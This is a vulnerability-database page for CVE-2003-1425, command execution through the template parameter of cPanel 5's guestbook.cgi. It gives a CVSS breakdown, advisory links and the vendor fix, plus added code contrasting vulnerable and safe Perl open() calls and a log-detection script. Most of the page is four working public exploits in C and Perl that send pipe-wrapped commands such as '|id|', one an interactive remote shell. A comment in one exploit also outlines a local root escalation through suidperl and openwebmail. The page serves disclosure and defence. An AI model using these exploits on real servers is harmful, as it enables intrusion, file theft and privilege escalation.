CVE-2003-1425
CVSS 10.0
Published: 2003-12-31 00:00:00
Revised: 2008-09-05 16:36:54

[Original] guestbook.cgi in cPanel 5.0 allows remote attackers to execute arbitrary commands via the template parameter.


[CNNVD] cPanel Guestbook.cgi Remote Command Execution Vulnerability (CNNVD-200312-108)

        
        cPanel is a web hosting control panel that lets customers manage their web accounts through a web interface.
        The guestbook.cgi script shipped with cPanel does not properly validate user-supplied data; a remote attacker can exploit this to run arbitrary commands with the privileges of the cPanel process.
        guestbook.cgi hands the template parameter to Perl's open() without filtering shell metacharacters, so a value such as '|command' (or 'command|') is treated as a pipe and the command is passed to the shell. An attacker can thereby execute arbitrary commands or read arbitrary files with the privileges of the cPanel process.
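The description above is the whole bug: a two-argument Perl open() whose second argument is attacker-controlled. The script below is an added example, not cPanel's code; guestbook.cgi's source is not on this page, so render_template_vulnerable() is an assumed model of the "classic perl open function vulnerability" named in the advisory, and the template directory, file names and inputs are constructed for the demo. It shows the same input handled by the vulnerable form and by a hardened form (allowlisted name, server-built path, three-argument open with an explicit mode).

```perl
#!/usr/bin/perl
# Added example, not cPanel's code: guestbook.cgi's source is not on this page,
# so render_template_vulnerable() is an assumed model of the "classic perl
# open function vulnerability" the advisory describes, beside a fixed version.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Constructed template directory standing in for wherever cPanel keeps its
# guestbook templates (the real location is not given on this page).
my $TEMPLATE_DIR = tempdir(CLEANUP => 1);
open(my $t, '>', File::Spec->catfile($TEMPLATE_DIR, 'default.tmpl')) or die "$!";
print $t "<h1>Guestbook</h1>\n";
close $t;

# VULNERABLE: two-argument open() parses its second argument as a mode spec.
#   "|cmd"  -> pipe to cmd        "cmd|"   -> pipe from cmd (output readable)
#   ">f"    -> truncate f         "../x"   -> any file the CGI user can read
sub render_template_vulnerable {
    my ($template) = @_;            # straight from the template= parameter
    open(my $fh, $template) or return "open failed: $!\n";
    local $/;                       # slurp
    my $body = <$fh>;
    close $fh;
    return defined $body ? $body : '';
}

# FIXED: allowlist the name, build the path ourselves, and use three-argument
# open() with an explicit '<' mode so the name is never parsed for pipes.
sub render_template_safe {
    my ($template) = @_;
    return "rejected: bad template name\n"
        unless defined $template && $template =~ /\A[A-Za-z0-9_-]{1,32}\z/;
    my $path = File::Spec->catfile($TEMPLATE_DIR, "$template.tmpl");
    open(my $fh, '<', $path) or return "rejected: no such template\n";
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Constructed inputs: a legitimate request, then the two shapes the exploits
# on this page send (command with a trailing pipe; arbitrary file path).
my @inputs = (
    File::Spec->catfile($TEMPLATE_DIR, 'default.tmpl'),   # what the CGI expects
    'id|',                                                # runs id, reads its output
    $0,                                                   # reads this very script
);
for my $in (@inputs) {
    print "== template=$in\n";
    print "vulnerable: ", substr(render_template_vulnerable($in), 0, 60), "\n";
    print "safe:       ", render_template_safe($in);
}
print "== template=default\nsafe:       ", render_template_safe('default');
```

Run it with plain perl; the vulnerable path prints the output of id for the 'id|' input and the first line of the script for the $0 input, while the safe path rejects both and only serves the allowlisted name "default". Note that the leading-pipe form ('|id') also works against two-argument open() but sends the command's output to the CGI's own stdout, i.e. into the HTTP response, which is why the exploits on this page do not need to read anything back.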
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [the system can be taken down completely]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: NETWORK [no intranet or local access required]
Authentication: NONE [no authentication required to exploit]

- CWE (weakness category)

CWE-20 [Improper Input Validation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1425
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1425
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-108
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/11356
(UNKNOWN)  XF  cpanel-guestbook-command-execution(11356)
http://www.securityfocus.com/bid/6882
(UNKNOWN)  BID  6882
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0087.html
(UNKNOWN)  VULNWATCH  20030218 Cpanel 5 and below remote command execution and local root vulnerabilities

- Vulnerability information

cPanel Guestbook.cgi Remote Command Execution Vulnerability
Critical  Input validation
2003-12-31 00:00:00 2003-12-31 00:00:00
Remote
        
        cPanel is a web hosting control panel that lets customers manage their web accounts through a web interface.
        The guestbook.cgi script shipped with cPanel does not properly validate user-supplied data; a remote attacker can exploit this to run arbitrary commands with the privileges of the cPanel process.
        guestbook.cgi hands the template parameter to Perl's open() without filtering shell metacharacters, so a value such as '|command' (or 'command|') is treated as a pipe and the command is passed to the shell. An attacker can thereby execute arbitrary commands or read arbitrary files with the privileges of the cPanel process.
        

- Advisories and patches

        Vendor patch:
        cPanel
        ------
        The vendor has released an upgrade that fixes this issue; download cPanel 6.0 from the vendor's site:
        
        http://www.cpanel.net

- Vulnerability information (22260)

cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (1) (EDBID:22260)
cgi webapps
2003-02-19 Verified
0 bob
N/A
source: http://www.securityfocus.com/bid/6882/info

A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script.

An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.

This vulnerability has been reported to affect cPanel version 5; previous versions may also be affected.

/*
 * DSR-cpanel.c by bob@dtors.net
 * Vulnerability found by Polkeyzz
 *
 * This is a Proof of Concept exploit for
 * cpanel 5 and below. Problem is an open()
 * in guestbook.cgi.
 *
 * User may view any file or execute commands.
 * There also exists a local vulnerability to
 * escalate privileges to root.
 *
 * PoC by bob of dtors.net >>DSR-apache rewrite<<
 *
 * Note: <command> is dropped straight into the template parameter, so it
 * must carry Perl's open() pipe syntax itself (e.g. "id|" or "|id") and be
 * URL-safe (no unencoded spaces).
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

int main(int argc, char *argv[]) {
    int sock;
    char exp[1024];                 /* room for the request line, host and command */
    struct sockaddr_in sin;
    struct hostent *bob;

    fprintf(stdout, "\n\tDSR-cpanel.c By bob.\n");
    fprintf(stdout, "Proof Of Concept Code for cpanel 5.0 <\n");
    fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");

    if (argc < 3) {
        fprintf(stderr, "\nUsage : %s <host> <command>\n\n", argv[0]);
        exit(1);
    }

    if ((bob = gethostbyname(argv[1])) == NULL) {
        fprintf(stderr, "Socket Error!\n\n");
        exit(1);
    }
    sock = socket(AF_INET, SOCK_STREAM, 0);
    memset(&sin, 0, sizeof(sin));
    memcpy(&sin.sin_addr, bob->h_addr, bob->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    fprintf(stdout, "Connecting...\n");
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
        fprintf(stderr, "...Problem Connecting, Exited.\n");
        exit(1);
    }

    /* The original snprintf() lacked its buffer argument and split the format
     * string across lines; it also used '/' where the query-string '?' belongs,
     * so the parameters would have arrived as PATH_INFO rather than as
     * user= and template=. The response is not read back, so output of a
     * "cmd|" form is discarded; use the "|cmd" form to see it on the server
     * side's stdout (i.e. the HTTP response) when reading it with a client. */
    snprintf(exp, sizeof(exp),
             "GET /cgi-sys/guestbook.cgi?user=cpanel&template=%s HTTP/1.1\r\nHost: %s\r\n\r\n",
             argv[2], argv[1]);
    write(sock, exp, strlen(exp));
    fprintf(stdout, "Command sent/executed!\n\n");
    close(sock);
    return 0;
}
		

- Vulnerability information (22261)

cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (2) (EDBID:22261)
cgi webapps
2003-02-19 Verified
0 CaMaLeoN
N/A
source: http://www.securityfocus.com/bid/6882/info
 
A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script.
 
An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
 
This vulnerability has been reported to affect cPanel version 5; previous versions may also be affected.

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
print "##########################################\n";
print "#                                        #\n";
print "#      Remote Exploit for Cpanel 5       #\n";
print "#                                        #\n";
print "##########################################\n";
print "                           C0d3r: CaMaLeoN\n";
die "Use: $0 <host> <command>\n" unless ($ARGV[1]);
$web=$ARGV[0];
$comando=$ARGV[1];
# The command goes straight into the template parameter, so it must carry the
# open() pipe syntax itself (e.g. "|id") and already be URL-encoded.
$fallos="cgi-sys/guestbook.cgi?user=cpanel&template=$comando";
$url="http://$web/$fallos";
$ua = LWP::UserAgent->new();
# A HEAD request still triggers the open() server-side but discards the body,
# so command output is never shown; only the status code is checked.
$request = HTTP::Request->new('HEAD', $url);
$response = $ua->request($request);
if ($response->code == 200){
    print "Command sent.\n";
} else {
    print "The command could not be sent.\n";
}
		

- Vulnerability information (22262)

cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (3) (EDBID:22262)
cgi webapps
2003-02-19 Verified
0 SPAX
N/A
source: http://www.securityfocus.com/bid/6882/info
  
A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script.
  
An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
  
This vulnerability has been reported to affect cPanel version 5; previous versions may also be affected.

#####################################################
# cpanel-plus.pl exploit
# Spawn bash style Shell on Apache CPANEL
#
# Spabam 2003 PRIV8 code
#
# spax@zone-h.org
# This Script is currently under development
#####################################################
use strict;
use IO::Socket;
my $host;
my $port;
my $command;
my $url;
my @results;
my $probe;
my @U;
my $shit;
$U[1] = "/cgi-sys/guestbook.cgi?user=cpanel&template=|";
&intro;
&scan;
&choose;
&command;
&exit;
sub intro {
&help;
&host;
&server;
sleep 3;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
#print "\nPort (enter to accept 80): ";
$shit="|";
$port="80";
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
#print "\nGet IIS string ...";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
        $output = $results[$X];
        if (defined $output){
        if ($output =~/IIS/){ $webserver = "iis" };
        };
};
if ($webserver ne "iis"){
#print "\a\a\n\nWARNING : UNABLE TO GET IIS STRING.";
#print "\nThis Server may not be running Micro\$oft IIS WebServer";
#print "\n\n\nContinue anyway? ... [Y/N]";
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\nOK";
        };
};
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
#print "\nScanning $host on port $port ...";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
                              $status = "vulnerable";
                              };
        };
if ($flag eq "0") {
#print "\nNo URL $loop...";
}else{
print "\a\a\a\n$host VULNERABLE TO URL $loop !!!";
     };
};
if ($status eq "not_vulnerable"){

#"SORRY $host is NOT Vulnerable to this Exploit.";
                                };
};
sub choose {
#print "\nSelect a URL (type 0 to input)";
my $choice="0";
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
#print "\nURL: HTTP://$host$url";
};
sub other {
#print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/+";
#print "\nHTTP://$host";
my $other = "/cgi-sys/guestbook.cgi?user=cpanel&template=|";
chomp $other;
$U[0] = $other;
};
sub command {
while ($command !~/quit/i) {
#print "\nHELP QUIT URL SCAN Or Command eg dir C: ";
print "\n[$host]\$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g;
#print "HTTP://$host$url$command";
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};
sub connect {
my $connection = IO::Socket::INET->new (
                                Proto => "tcp",
                                PeerAddr => "$host",
                                PeerPort => "$port",
                                ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
# $shit holds the trailing "|" set in &host; the original referenced an
# undeclared $shiz here, which does not compile under "use strict".
print $connection "GET $url$command$shit HTTP/1.1\r\nHost: $host\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
};

# The first line read (the status line) is consumed by the while condition;
# everything after it is slurped into @results.
while ( <$connection> ) {
                        @results = <$connection>;
                         };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};
sub output{
#print "\nOUTPUT FROM $host. \n\n";
my $display;
if ($probe eq "string") {
                        my $X;
                        for ($X=0; $X<=10; $X++) {
                        $display = $results[$X];
                        if (defined $display){print "$display";};
                        sleep 1;
                                };
                        }else{
                        foreach $display (@results){
                            print "$display";
                            sleep 1;
                                };
                          };
};
sub exit{
print "\n\n\n
SPABAM 2003.";
print "\nspabam.tk spax\@zone-h.org";
print "\n\n\n";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
        CPANEL-PLUS 1.1 by SPABAM spax 2003";
print "\n
";
print "\n A CPANEL EXPLOIT WHICH SPAWN A BASH STYLE SHELL";
print "\n
note.. web directory is normally /var/www/html";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n\n\n\n\n\n\n\n\n\n\n\n";
};
		

- Vulnerability information (22263)

cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (4) (EDBID:22263)
cgi webapps
2003-02-19 Verified
0 pokleyzz
N/A
source: http://www.securityfocus.com/bid/6882/info
   
A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script.
   
An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
   
This vulnerability has been reported to affect cPanel version 5; previous versions may also be affected.

#!/usr/bin/perl
#
# ------- start here -------
#
# Bug found by: pokleyzz
#
# Cpanel is a web hosting control panel which allows clients to manage their web accounts through
# a web interface. Most of the applications are written in perl and compiled to binary.
#
# Details
# =======
# There are multiple vulnerabilities in this package, as described below.
#
# 1) Remote command execution in guestbook.cgi (/usr/local/cpanel/cgi-sys/guestbook.cgi)
#
# There is a classic perl open function vulnerability in the template variable which allows any
# user to read any file or run commands as the valid system user assigned to the specific url
# in the apache configuration.
#
# 2) Local privilege escalation (root)
#
# Cpanel comes with the openwebmail package as one of its web based email readers, which is suid root.
# On a system with suid perl installed properly (with suid mode turned on), a local user may
# include their own perl script when running the openwebmail script (oom) through suidperl.
#
# Openwebmail will append to the perl include path (@INC) via the SCRIPT_FILENAME environment variable,
# then include some files when executed.
#
# /usr/local/cpanel/base/openwebmail/oom line 14
#
# if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[\w\d\-]+\.pl! || $0 =~ m!^(.*?)/[\w\d\-]+\.pl! ) { $SCRIPT_DIR=$1; }
# if (!$SCRIPT_DIR) { print "Content-type: text/html\n\n\$SCRIPT_DIR not set in CGI script!\n"; exit 0; }
# push (@INC, $SCRIPT_DIR, ".");
# .
# .
# .
# require "openwebmail-shared.pl";
#
# proof of concept:
# i) Create a file openwebmail-shared.pl containing the perl script you want to execute.
# ii) Set SCRIPT_FILENAME to point to the full path of the openwebmail-shared.pl file you just created.
# iii) Execute the oom script (ex: suidperl -T /usr/local/cpanel/base/openwebmail/oom )
#
# -------- cut here --------
#
# coded by cyzek. cyzek@efnet
# thanks for p0ng p0ng@brasnet.org

use IO::Socket::INET;

$url = $ARGV[0];
$cmd = $ARGV[1];

if(@ARGV != 2){
        print " jozc.pl - Cpanel 5 and below Remote Exploit by cyzek.\n";
        print " use %20 for spaces.\n";
        print " usage: $0 <host> <cmd>\n";
        exit;
}

$rem = IO::Socket::INET->new(
Proto       => "tcp",
PeerAddr    => $url,
PeerPort    => "80");

if ($rem) {
        # The command is wrapped in pipes so Perl's two-argument open() treats
        # the template value as a pipe and runs it; the full response, which
        # carries the command output, is read back. Line endings are CRLF; the
        # original sent a malformed " \n\r\n\r\n\r" terminator.
        print $rem "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.0\r\n\r\n";
        @resp = <$rem>;
}
print "@resp\n\n";
		

- Vulnerability information

4220
cPanel guestbook.cgi template Variable Arbitrary Command Execution
Remote / Network Access; Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

cPanel contains a flaw that allows a remote attacker to execute arbitrary commands. The issue is due to the "guestbook.cgi" script not properly sanitizing input to the "template" variable. By providing a specially crafted argument to this variable, an attacker can execute arbitrary commands.

- Timeline

2003-02-19 2003-02-14
2003-02-19 Unknown

- Solution

Upgrade to version 6.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
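With no workaround short of upgrading, a host still on an affected version should at least be watched for the request shape the exploits on this page send. The script below is an added example, not from the page or from cPanel: the five Apache combined-format log lines are constructed (RFC 5737 test addresses), and the check flags any guestbook.cgi request whose URL-decoded template parameter carries two-argument open() mode characters or directory traversal.

```perl
#!/usr/bin/perl
# Added example, not from the page or cPanel: an Apache access-log check for
# the request shapes the exploits on this page send. The log lines below are
# constructed for this demo, not real captures.
use strict;
use warnings;

my @LOG = (
  '203.0.113.5 - - [19/Feb/2003:10:01:02 +0000] "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|id| HTTP/1.0" 200 512 "-" "-"',
  '203.0.113.5 - - [19/Feb/2003:10:01:09 +0000] "GET /cgi-sys/guestbook.cgi?user=cpanel&template=%7Ccat+/etc/passwd HTTP/1.1" 200 2048 "-" "-"',
  '198.51.100.7 - - [19/Feb/2003:10:02:15 +0000] "GET /cgi-sys/guestbook.cgi?user=cpanel&template=default HTTP/1.1" 200 1340 "-" "Mozilla/4.0"',
  '198.51.100.7 - - [19/Feb/2003:10:02:20 +0000] "HEAD /cgi-sys/guestbook.cgi?user=cpanel&template=uname%20-a| HTTP/1.1" 200 0 "-" "-"',
  '198.51.100.9 - - [19/Feb/2003:10:03:01 +0000] "GET /index.html HTTP/1.1" 200 100 "-" "-"',
);

# Decode application/x-www-form-urlencoded text (+ and %XX).
sub url_decode {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Returns the decoded template value when the line is a guestbook.cgi request
# whose template contains two-argument open() mode characters or a ".."
# path component, otherwise undef. Decoding first defeats %7C for '|'.
sub suspicious_template {
    my ($line) = @_;
    return undef unless $line =~ /"(?:GET|HEAD|POST) (\S+) HTTP\/[\d.]+"/;
    my $target = $1;
    return undef unless $target =~ m{/guestbook\.cgi\?(.*)\z};
    my %q;
    for my $pair (split /&/, $1) {
        my ($k, $v) = split /=/, $pair, 2;
        my $key = url_decode($k);
        $q{$key} = url_decode(defined $v ? $v : '');
    }
    my $t = $q{template};
    return undef unless defined $t;
    return $t if $t =~ /[|<>]/ || $t =~ m{(?:\A|/)\.\.(?:/|\z)};
    return undef;
}

for my $line (@LOG) {
    my $t = suspicious_template($line);
    next unless defined $t;
    my ($ip) = $line =~ /\A(\S+)/;
    print "ALERT $ip guestbook.cgi template=[$t]\n";
}
```

Against the constructed lines it alerts on three requests (the pipe-wrapped id, the %7C-encoded pipe to cat, and the HEAD with a trailing pipe) and stays quiet on the legitimate template=default request. A HEAD request is included deliberately: as exploit (2) above shows, the command still runs even when the attacker never reads the body, so a 200 with zero bytes is not evidence that nothing happened.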


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's websites